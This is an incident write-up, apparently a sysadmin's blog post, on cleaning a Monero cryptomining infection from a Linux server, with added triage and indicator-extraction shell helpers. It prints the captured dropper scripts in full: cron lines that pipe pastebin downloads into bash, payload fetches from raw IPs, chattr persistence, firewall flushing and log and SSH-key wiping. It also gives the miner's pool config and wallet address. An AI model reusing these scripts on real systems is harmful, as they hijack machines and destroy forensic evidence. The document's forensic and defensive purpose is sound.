Investigating a cryptomining infection

      The load on one of our company servers suddenly shot up. Running top showed a very odd process.

      I grepped for that process ID and found it was running from /tmp/.solr/solrd, so I immediately killed the process and deleted the program, and the load came back down. But that wasn't the end of it: running top again, I was surprised to see a script called solr.sh executing. Grepping its PID showed it was also running out of /tmp, but oddly, although the script was clearly running, it could not be found at that path, and a global find could not locate it either. To stop it doing any more damage I killed the process and added a security group in the Alibaba Cloud console allowing only port 80 and 443 requests in.

     

      Still not done: a while later the solr.sh script started running again, although the main payload solrd did not. Presumably, because of the port restrictions, the package could no longer get in. So I quickly took the following measures:

    1. Change the server password;
    2. Check /etc/passwd and /etc/group for unfamiliar users;
    3. Check the scheduled tasks. This check really did turn something up, but when I went to clear the crontab I got "permission denied". I'm root, how can I not have permission? So I checked for special attributes, and sure enough they were set; I removed them one by one. I then checked /etc/cron.d/, /etc/cron.daily/, /etc/cron.deny, /etc/cron.hourly/, /etc/cron.monthly/, /etc/crontab and /etc/cron.weekly/, and without exception every one of them had scheduled tasks, all with the special attributes set as well;

    [root@jira-wiki log]# crontab -l
    */10 * * * * curl -fsSL https://pastebin.com/raw/xsC5mrCe | bash
    [root@jira-wiki log]# crontab -r
    /var/spool/cron/root: Operation not permitted
    [root@jira-wiki log]# lsattr /var/spool/cron/
    ----ia-------e-- /var/spool/cron/root
    [root@jira-wiki log]# chattr -ia /var/spool/cron/root
    [root@jira-wiki log]# lsattr /var/spool/cron/
    -------------e-- /var/spool/cron/root
    [root@jira-wiki log]# chattr -e /var/spool/cron/root
    [root@jira-wiki log]# lsattr /var/spool/cron/
    ---------------- /var/spool/cron/root
    [root@jira-wiki log]#

    4. Use last to see recently logged-in users;
    5. Analyse the /var/log/messages and /var/log/secure logs;

    6. mv the chattr command somewhere else and rename it, in a location known only to the administrator, and set the append-only (+a) attribute on /var/log/wtmp, /var/log/secure and /var/log/cronrot, otherwise it is very unpleasant when those logs get wiped. Finally, be sure to clear the traces of moving chattr so that the attackers don't learn where you moved it.
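What the cleanup above is fighting, as an added triage helper (example code written for this page, not the author's commands and not part of the malware): the cron entries that pipe a pastebin download into a shell, the chattr i/a attributes that made crontab -r fail, and the script that was visibly running but could not be found on disk. That last symptom is explained by the dropper itself further down the page: it launches /tmp/.solr/solr.sh with nohup and then rm -f's it ten seconds later, so the process keeps running from an unlinked file that find will never see. The kernel still exposes it under /proc/PID (exe, cwd and the open file descriptor for the script, all marked "(deleted)"), and that is where to copy it from for analysis. Note also that the re-download is an outbound curl, so an inbound-only security group does not stop it; the cron entry has to go, and ideally egress to the listed hosts is blocked too. The sample crontab and lsattr lines are constructed from the entries shown above; the function names are my own.

```shell
#!/bin/sh
# Added triage helpers for the cleanup described above (example code written for
# this page; not the author's commands and not part of the malware).
# The text-processing functions read stdin, so they work on live output
# ("crontab -l | count_pipe_to_shell") or on a copy saved during triage.

# Cron lines that pipe a curl/wget download straight into sh/bash/dash/zsh,
# the pattern of the pastebin entries above. Prints the number of hits (0 if none).
count_pipe_to_shell() {
    grep -cE '(curl|wget)[^|]*\|[[:space:]]*(ba|da|z)?sh([[:space:]]|$)' || true
}

# Paths in lsattr output that carry the immutable (i) or append-only (a) flag.
# These are the files "crontab -r" and "rm" refuse to touch even as root;
# strip them with "chattr -ia PATH" first. Both flags also appear on files a
# defender protected on purpose (e.g. "chattr +a /var/log/secure"), so review
# the list rather than blindly clearing it.
list_locked_attrs() {
    awk '$1 ~ /[ia]/ { print $2 }'
}

# Processes holding an executable or an open file that has been unlinked.
# A dropper that starts a script with nohup and then rm's the file (as the
# captured solr.sh does) leaves nothing for find to see, but the kernel keeps
# the inode alive: /proc/PID/exe points at the interpreter and the script is
# still open (fd 255 under bash) with " (deleted)" appended to the link target.
# Recover it with "cat /proc/PID/fd/N > /root/evidence/solr.sh" before killing.
# memfd-backed (fileless) payloads show up here too, as "/memfd:... (deleted)".
deleted_file_handles() {
    for p in /proc/[0-9]*; do
        for l in "$p/exe" "$p"/fd/*; do
            t=$(readlink "$l" 2>/dev/null) || continue
            case "$t" in
                *" (deleted)") echo "${p#/proc/} ${l#"$p"/} $t" ;;
            esac
        done
    done
}

# Constructed sample input, modelled on the crontab and lsattr output above.
SAMPLE_CRON='*/10 * * * * curl -fsSL https://pastebin.com/raw/xsC5mrCe | bash
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * root curl -fsSL https://pastebin.com/raw/T6hvUyQq | sh
@reboot /usr/local/bin/backup.sh'

SAMPLE_LSATTR='----ia-------e-- /var/spool/cron/root
-------------e-- /etc/crontab
-----a-------e-- /var/log/wtmp'

run_demo() {
    echo "pipe-to-shell cron entries: $(printf '%s\n' "$SAMPLE_CRON" | count_pipe_to_shell)"
    echo "files locked with chattr i/a:"
    printf '%s\n' "$SAMPLE_LSATTR" | list_locked_attrs
    echo "processes with unlinked executables or open files:"
    deleted_file_handles
}

if [ "${1:-}" = "--demo" ]; then
    run_demo
fi
```

Run it as `sh triage.sh --demo` to see the sample results, or feed the real system in: `crontab -l | count_pipe_to_shell`, `lsattr /var/spool/cron /etc/cron.d /etc/crontab | list_locked_attrs`. Running deleted_file_handles as root before killing anything is what preserves the evidence the author later had to recover from a copy.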

      At the time I took a copy of its program. Looking at its configuration file afterwards, I found the following section; visiting the URL showed it to be a Monero mining pool. A quick Baidu search shows that plenty of other people have been hit by this one.

        "pools": [
            {
                "algo": null,
                "coin": null,
                "url": "pool.supportxmr.com:80",
                "user": "4APyW6eriFEHcp4jVaGLP7eUVMV332fdrKn5iEqHcPjQMy1giyzy9phM2GrFYJ87eNEXJi3CqTaJYbfBVQWS22ke9ke9oVB",
                "pass": "x",
                "rig-id": null,
                "nicehash": false,
                "keepalive": false,
                "enabled": true,
                "tls": false,
                "tls-fingerprint": null,
                "daemon": false,
                "socks5": null,
                "self-select": null
            }
        ],

     Finally, here is what this damned mining malware did on my server, for the record:

    #!/bin/sh
    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
    ps aux | grep -v grep | grep 'givemexyz' | awk '{print $2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'dbuse' | awk '{print $2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'javaupDates' | awk '{print $2}' | xargs -I % kill -9 %
    ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
    killall /tmp/*
    killall /tmp/.*
    killall /var/tmp/*
    killall /var/tmp/.*
    pgrep JavaUpdate | xargs -I % kill -9 %
    pgrep kinsing | xargs -I % kill -9 %
    pgrep donate | xargs -I % kill -9 %
    pgrep kdevtmpfsi | xargs -I % kill -9 %
    pgrep sysupdate | xargs -I % kill -9 %
    pgrep mysqlserver | xargs -I % kill -9 %
    chattr -ia /var/spool/cron/root
    crontab -r
    crontab -l | grep -e "T6hvUyQq" | grep -v grep
    if [ $? -eq 0 ]; then
      echo "cron good"
    else
      (
        crontab -l 2>/dev/null
        echo "*/5 * * * * curl -fsSL https://pastebin.com/raw/T6hvUyQq | sh"
      ) | crontab -
    fi
    rm -f /tmp/*
    rm -f /tmp/.sola
    s2=`whoami`
    if [ `whoami` = "root" ];
    then
        chattr -ia /etc/cron.d/*
        rm -rf /etc/cron.d/*
        chattr -i /var/spool/cron/crontabs/root
        chattr -i /usr/local/bin/dns
        rm -f /etc/cron.hourly/oanacroner
        rm -f /etc/cron.hourly/oanacrona
        rm -f /etc/cron.daily/oanacroner
        rm -f /etc/cron.daily/oanacrona
        rm -f /etc/cron.monthly/oanacroner
        rm -f /usr/local/bin/dns
        rm -f /etc/update.sh
        chattr -ia /etc/hosts
        echo >/etc/hosts
        chattr +ia /etc/hosts
        chattr -i /etc/sysupdate
        rm -f /etc/sysupdate
        rm -f /etc/config.json
        rm -f /var/tmp/kworkerds
        rm -f /usr/bin/.systemcero
        rm -f /usr/bin/cloudupdate
        rm -f /usr/bin/diskmanagerd
        rm -f /lib/libterminfo.so
        rm -f /bin/httpsntp
        rm -f /bin/ftpsntp
        rm -f /var/tmp/jspserv
        rm -f /usr/sbin/cron
        rm -f /usr/bin/kinsing*
        rm -f /etc/cron.d/kinsing*
        rm -f /usr/bin/node
        chattr -isa /var/spool/cron/*
        rm -rf /var/spool/cron/*
        chattr +isa /tmp/xms
        rm -f /var/tmp/kinsing
        chattr -ia /etc/crontab
        echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xsC5mrCe | sh' > /etc/crontab
        chattr +ia /etc/crontab
        chattr -ia /var/spool/cron/root
        chattr -ia /var/spool/cron/crontabs/root
        echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xsC5mrCe | bash' >/var/spool/cron/root
        echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xsC5mrCe | bash' >/var/spool/cron/crontabs/root
        echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xsC5mrCe | sh' > /etc/cron.d/root
        chattr +ia /var/spool/cron/root
        chattr +ia /etc/cron.d/root
        chattr +ia /var/spool/cron/crontabs/root
    else
        ps aux | grep -v 'java|redis|weblogic|mongod|mysql|oracle|tomcat|grep|postgres|atlassian|awk|sbin|WebLogic.sh|solr|server|aux|httpd|sh|sbin|' | grep ${s2:0:7} | awk '{print $2}' | xargs -I % kill -9 %
        ps aux | grep -v 'java|redis|weblogic|mongod|mysql|oracle|tomcat|grep|postgres|atlassian|awk|sbin|WebLogic.sh|solr|server|aux|httpd|sh|defunct|sbin|' | grep $s2 | awk '{print $2}' | xargs -I % kill -9 %
    fi
    chmod +777 /tmp/*
    pkill networkservice
    pkill networkser+
    pkill watchbog
    pkill xmrig
    p=$(ps auxf|grep solrd|awk '{if($3>=60.0) print $2}')
    name=""$p
    if [ -z "$name" ]
    then
        pkill solr.sh
        pkill solrd
        ps aux | grep -v grep | grep -v 'java|redis|mongod|mysql|oracle|tomcat|grep|postgres|confluence|awk|aux|sh' | awk '{if($3>60.0) print $2}' | xargs -I % kill -9 %
        chmod +rwx /tmp/.solr
        rm -rf /tmp/.solr
        mkdir /tmp/.solr
        curl -fsSL http://27.1.1.34:8080/docs/s/config.json -o /tmp/.solr/config.json
        curl -fsSL http://222.122.47.27:2143/auth/solrd.exe -o /tmp/.solr/solrd
        curl -fsSL http://27.1.1.34:8080/docs/s/solr.sh -o /tmp/.solr/solr.sh
        chmod +x /tmp/.solr/solrd
        chmod +x /tmp/.solr/solr.sh
        nohup /tmp/.solr/solr.sh &>>/dev/null &
        sleep 10
        rm -f /tmp/.solr/solr.sh
    else
        exit
    fi

    #!/bin/bash
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    
    setenforce 0 2>/dev/null
    ulimit -n 65535
    ufw disable
    iptables -P INPUT ACCEPT
    iptables -P OUTPUT ACCEPT
    iptables -P FORWARD ACCEPT
    iptables -F
    echo "vm.nr_hugepages=$((1168+$(nproc)))" | tee -a /etc/sysctl.conf
    sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
    echo '0' >/proc/sys/kernel/nmi_watchdog
    echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
    mv /usr/bin/ps.original /usr/bin/ps
    netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
    netstat -antp | grep '23.94.24.12'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
    netstat -antp | grep '134.122.17.13'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
    netstat -antp | grep '66.70.218.40'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
    netstat -antp | grep '209.141.35.17'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
    echo "123"
    netstat -antp | grep '119.28.4.91'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
    netstat -antp | grep '101.32.73.178'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
    netstat -antp | grep 185.238.250.137 | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep tmate | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep kinsing | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep kdevtmpfsi | awk '{print $7}' | awk  -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep pythonww | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep tcpp | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep c3pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep xmr | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep f2pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep crypto-pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep t00ls | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep vihansoft | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    netstat -antp | grep mrbpool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %
    ps -fe | grep -v '.rsyslogds' | grep '/tmp' | grep -v grep  | awk '{print $2}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %
    if ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fi
    if ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fi
    if ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fi
    if ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fi
    echo $DLB
    if [ -w /usr/sbin ]; then
      SPATH=/usr/sbin
    else
      SPATH=/tmp
    fi
    ipurl="http://107.172.214.23:1234"
    $DLB $SPATH/.rsyslogds $ipurl/.rsyslogds;chmod +x $SPATH/.rsyslogds;/tmp/.rsyslogds;chattr +ai $SPATH/.rsyslogds
    $DLB $SPATH/.inis $ipurl/.inis;chmod +x $SPATH/.inis
    cd $SPATH/
    nohup ./.inis 1>/dev/null 2>&1 &
    chattr +ia $SPATH/.inis
    history -c
    echo 0>/root/.ssh/authorized_keys
    echo 0>/var/spool/mail/root
    echo 0>/var/log/wtmp
    echo 0>/var/log/secure
    echo 0>/var/log/cronrot
    echo 0>~/.bash_history
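A captured dropper like the two scripts above is worth more than a curiosity: it names every host it downloads from, every rival-miner address it kills connections to, every file it drops, and every path it pins with chattr so the operator cannot remove it. The helpers below, added here as example code (not part of the malware and not the author's procedure), pull those indicators out of the script text so they can be blocked at the egress firewall and swept for on other hosts. One caveat the pool config above makes obvious: pool.supportxmr.com is contacted on port 80, so a port-based egress rule would let it through; block by hostname or address. The sample is a handful of lines excerpted from the dropper shown above (the netstat line abridged); function names are my own.

```shell
#!/bin/sh
# Added IOC-extraction helpers (example code written for this page; not part of
# the malware and not the author's procedure). Each function reads a captured
# dropper script on stdin and prints one indicator per line, de-duplicated.

# Every http(s) URL the script fetches from or pipes into a shell.
extract_urls() {
    grep -oE "https?://[^[:space:]\"'|;)]+" | LC_ALL=C sort -u
}

# Bare IPv4 addresses: download/C2 hosts plus the rival-miner IPs it kills.
extract_ips() {
    grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | LC_ALL=C sort -u
}

# Files the script pins with "chattr +i/+a": its persistence points. These
# need "chattr -ia" before they can be cleaned, exactly as the author found.
extract_locked_paths() {
    sed -nE 's/.*chattr [+][a-z]+ ([^ ;]+).*/\1/p' | LC_ALL=C sort -u
}

# Destinations of "curl ... -o PATH" downloads: the payloads it drops.
extract_download_targets() {
    sed -nE 's/.*curl[^;]* -o ([^ ;]+).*/\1/p' | LC_ALL=C sort -u
}

# Given a path list on stdin, print the ones present on this host. Run it on
# the other machines with the same exposure (here, the same Jira/Confluence
# deployment) to find out whether they were hit as well.
sweep_paths() {
    while IFS= read -r p; do
        if [ -e "$p" ]; then echo "$p"; fi
    done
}

count_lines() { wc -l | tr -d ' '; }

# Constructed sample: lines excerpted from the dropper shown above.
SAMPLE_DROPPER='*/10 * * * * curl -fsSL https://pastebin.com/raw/xsC5mrCe | bash
curl -fsSL http://27.1.1.34:8080/docs/s/config.json -o /tmp/.solr/config.json
curl -fsSL http://222.122.47.27:2143/auth/solrd.exe -o /tmp/.solr/solrd
curl -fsSL http://27.1.1.34:8080/docs/s/solr.sh -o /tmp/.solr/solr.sh
chattr +ia /etc/crontab
chattr +ia /var/spool/cron/root
chattr +ia /etc/cron.d/root
netstat -antp | grep 185.238.250.137 | xargs -I % kill -9 %
ipurl="http://107.172.214.23:1234"'

run_demo() {
    echo "== URLs to block ==";        printf '%s\n' "$SAMPLE_DROPPER" | extract_urls
    echo "== IPs to block ==";         printf '%s\n' "$SAMPLE_DROPPER" | extract_ips
    echo "== chattr-locked paths =="; printf '%s\n' "$SAMPLE_DROPPER" | extract_locked_paths
    echo "== dropped files ==";        printf '%s\n' "$SAMPLE_DROPPER" | extract_download_targets
    echo "== present on this host =="
    printf '%s\n' "$SAMPLE_DROPPER" | extract_download_targets | sweep_paths
}

if [ "${1:-}" = "--demo" ]; then
    run_demo
fi
```

On the real capture: `cat /root/evidence/solr.sh | extract_urls` and `... | extract_ips` give the egress deny-list, and `extract_locked_paths` and `extract_download_targets` piped into `sweep_paths` on each peer host tells you which of them carry the same infection.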
Original post: https://www.cnblogs.com/zhangzhide/p/15223446.html